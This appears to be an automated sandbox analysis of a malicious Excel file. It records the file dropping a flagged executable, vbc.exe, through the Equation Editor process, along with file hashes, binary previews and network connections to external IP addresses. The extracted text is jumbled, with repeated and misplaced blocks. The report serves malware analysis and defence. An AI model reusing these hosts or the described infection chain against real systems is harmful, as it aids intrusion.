eC..........x.C.42u...W...7.7.7

Process: C:\Users\Public\vbc.exe

File Type: ASCII text, with very long lines, with CRLF line terminators

Category: dropped

Size (bytes): 1026

Entropy (8bit): 4.70435191336402

Encrypted: false

SSDEEP: 24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix

MD5: 8C1F71001ABC7FCE68B3F15299553CE7

SHA1: 382285FB69081EB79C936BC4E1BFFC9D4697D881

SHA-256: DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE

SHA-512: 8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7

Malicious: false

Preview: NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE



Category: dropped

Size (bytes): 1026

Entropy (8bit): 4.690067217069288

Encrypted: false

SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EE9.png

C:\Users\user\AppData\Local\Temp\tmp3E26.tmp

C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp


MD5: 4E32787C3D6F915D3CB360878174E142

SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47

SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269

SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE

Malicious: false

Preview: AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ



Category: dropped

Size (bytes): 1026

Entropy (8bit): 4.70435191336402

Encrypted: false

SSDEEP: 24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix

MD5: 8C1F71001ABC7FCE68B3F15299553CE7

SHA1: 382285FB69081EB79C936BC4E1BFFC9D4697D881

SHA-256: DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE

SHA-512: 8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7

Malicious: false

Preview: NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE



Category: dropped

Size (bytes): 1026

Entropy (8bit): 4.690067217069288

Encrypted: false

SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl

MD5: 4E32787C3D6F915D3CB360878174E142

SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47

SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269

SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE

Malicious: false

Preview: AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp

C:\Users\user\AppData\Local\Temp\tmp533A.tmp

C:\Users\user\AppData\Local\Temp\tmp6222.tmp



File Type: SQLite 3.x database, last written using SQLite version 3032001

Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false

SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u

MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15

SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE

SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96

SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................



Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false


C:\Users\user\AppData\Local\Temp\tmp62EE.tmp








Malicious: false




Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 40960

Entropy (8bit): 0.7798653713156546

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 28672

Entropy (8bit): 0.9650411582864293

Encrypted: false

SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE

MD5: 903C35B27A5774A639A90D5332EEF8E0

SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF

SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74

SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277

Malicious: false

C:\Users\user\AppData\Local\Temp\tmp66A8.tmp


C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp


Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................



Category: dropped

Size (bytes): 28672

Entropy (8bit): 0.9650411582864293

Encrypted: false

SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE

MD5: 903C35B27A5774A639A90D5332EEF8E0

SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF

SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74

SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277

Malicious: false

Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................



Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false

SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi

MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6

SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7

SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C

SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D

Malicious: false

Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................



Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false


C:\Users\user\AppData\Local\Temp\tmp6C85.tmp



C:\Users\user\AppData\Local\Temp\tmp72BF.tmp




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

C:\Users\user\AppData\Local\Temp\tmp738B.tmp




Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false





C:\Users\user\AppData\Local\Temp\tmp764C.tmp





Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false




Category: dropped

Size (bytes): 77824

Entropy (8bit): 1.1340767975888557

Encrypted: false






Malicious: false


C:\Users\user\AppData\Local\Temp\tmp790D.tmp

C:\Users\user\AppData\Local\Temp\tmp79D9.tmp

C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp



File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000

Category: dropped


Entropy (8bit): 0.08107860342777487

Encrypted: false

SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY

MD5: 1138F6578C48F43C5597EE203AFF5B27

SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B

SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF

SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E

Malicious: false

Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000

Category: dropped


Entropy (8bit): 0.08107860342777487

Encrypted: false

SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY

MD5: 1138F6578C48F43C5597EE203AFF5B27

SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B

SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF

SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E

Malicious: false

Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


File Type: data

Category: dropped

Size (bytes): 512

Entropy (8bit): 0.0

Encrypted: false

SSDEEP: 3::

MD5: BF619EAC0CDF3F68D496EA9344137E8B

SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5

SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560

SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE

Malicious: false

Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


File Type: data

Category: dropped

Size (bytes): 512

C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp

C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp

C:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMP

C:\Users\user\AppData\Local\Temp\~DF26FE9B5EC11612F4.TMP


Entropy (8bit): 0.0

Encrypted: false

SSDEEP: 3::





Malicious: false

Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


File Type: data

Category: dropped

Size (bytes): 512

Entropy (8bit): 0.0

Encrypted: false

SSDEEP: 3::





Malicious: false

Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


File Type: CDFV2 Encrypted

Category: dropped


Entropy (8bit): 7.95591459608079

Encrypted: false

SSDEEP: 3072:q6+X3hQMFFQVv8V4J0aN0ZCQmVCzeKIhhw0J6il6qeFRJUVI0:yn6CCWVF20XECz9KIDgB

MD5: E9FFC84ABF7ED6F6A7BE0C9E347B4245

SHA1: D636A41A99A022B242A810C972F4E6ADCC779ABA

SHA-256: 03D548395841B2296DEE9A96F1ACA44337F238311A0B01D6CF61C0D998BCC59A

SHA-512: 66CD17A968D1DA8DDB4CD912EBA36F7148B44483BB9D5C49A8D855F226920BF01DB1D57E08CF051F571B27952732C5EBBD97CDC17A5672F5E2C17F088079B1BC

Malicious: false

Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...


File Type: data

Category: dropped

Size (bytes): 165

Entropy (8bit): 1.4377382811115937

Encrypted: false

SSDEEP: 3:vZ/FFDJw2fV:vBFFGS

MD5: 797869BB881CFBCDAC2064F92B26E46F

SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B

SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185

SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D

Malicious: true

C:\Users\user\AppData\Local\Temp\~DFAB0D2DA66A547388.TMP

C:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMP

C:\Users\user\Desktop\~$POAT2076452.xlsx


Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Category: dropped

Size (bytes): 14336

Entropy (8bit): 5.171700803602097

Encrypted: false

SSDEEP: 192:uYzXW2Cwl0D1p62Ojdu8kYfDOJSxYINAJ5:uYbWkGXOjdu8k4DOY6TJ

MD5: 980EC4304344F277D722024ADE08CD01

SHA1: DBA030AEE01753EA3E5EF7C9E73725A306B6DBA5

SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105

SHA-512: 222CAA856AB958EB7E0DF8AD41F0C9A5CE3EDD00FC10896058FB38A73A6CB897E3785862F0F1CD963D65CF5FE90E0E1A3A66E84F70C4BAF16762BC9192EEAD68

Malicious: true

Antivirus: Antivirus: ReversingLabs, Detection: 7%

Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.............................M... ...`....@.. ....................................@..................................M..S....`..............................PL............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@[email protected]..............@..B.................M......H........1..x.......9....................................................0..........(..........o...........s....(...+(...+.(.....8...........o....(...+....%..9......r...p([email protected](....-a..r...p(....-j..r#..p(....-s..r/..p(....:....8N......(.......2....i/...(.....8....r9..p(....8............(....(....8............(....(....8............(..........i0Ys........rU..po....&..rY..p.....(....(...+o....&..r_..po....&..o..........o....(....8....rc..p(....+v........(..........i0Vs

File type: CDFV2 Encrypted

Entropy (8bit): 7.95591459608079

TrID: Generic OLE2 / Multistream Compound File (8008/1) 100.00%

File name: POAT2076452.xlsx

File size: 190456

MD5: e9ffc84abf7ed6f6a7be0c9e347b4245

SHA1: d636a41a99a022b242a810c972f4e6adcc779aba

SHA256: 03d548395841b2296dee9a96f1aca44337f238311a0b01d6cf61c0d998bcc59a

SHA512: 66cd17a968d1da8ddb4cd912eba36f7148b44483bb9d5c49a8d855f226920bf01db1d57e08cf051f571b27952732c5ebbd97cdc17a5672f5e2c17f088079b1bc

SSDEEP: 3072:q6+X3hQMFFQVv8V4J0aN0ZCQmVCzeKIhhw0J6il6qeFRJUVI0:yn6CCWVF20XECz9KIDgB

File Content Preview:

........................>......................................................................................................................................................................................................................................

Icon Hash: e4e2aa8aa4b4bcb4

Total Packets: 41

• 53 (DNS)

• 443 (HTTPS)

C:\Users\Public\vbc.exe

Static File Info

General

File Icon

Network Behavior

Network Port Distribution


• 80 (HTTP)

Timestamp Source Port Dest Port Source IP Dest IP

Feb 22, 2022 15:30:27.291577101 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:27.612147093 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.613080025 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:27.613562107 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:27.935863018 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.935892105 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.935918093 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.935941935 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.936095953 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:28.257625103 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257653952 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257667065 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257680893 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257699013 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257715940 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257735014 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257903099 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:28.257942915 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:29.473887920 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:31.191129923 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.191171885 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.191234112 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.335231066 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.335268974 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.380274057 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.386909962 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.405797958 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.405827999 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.406517982 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.613889933 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.614546061 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.029573917 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.069870949 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075445890 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075669050 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075745106 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.075767040 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075790882 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075895071 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075954914 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.075964928 CET 443 49166 162.159.130.233 192.168.2.22

TCP Packets


Feb 22, 2022 15:30:32.075985909 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076024055 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076186895 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076256037 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076271057 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076289892 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076348066 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076383114 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076461077 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076531887 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076551914 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076627016 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076699972 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076720953 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076893091 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076961994 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076966047 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076987982 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077045918 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077070951 CET 443 49166 162.159.130.233 192.168.2.22

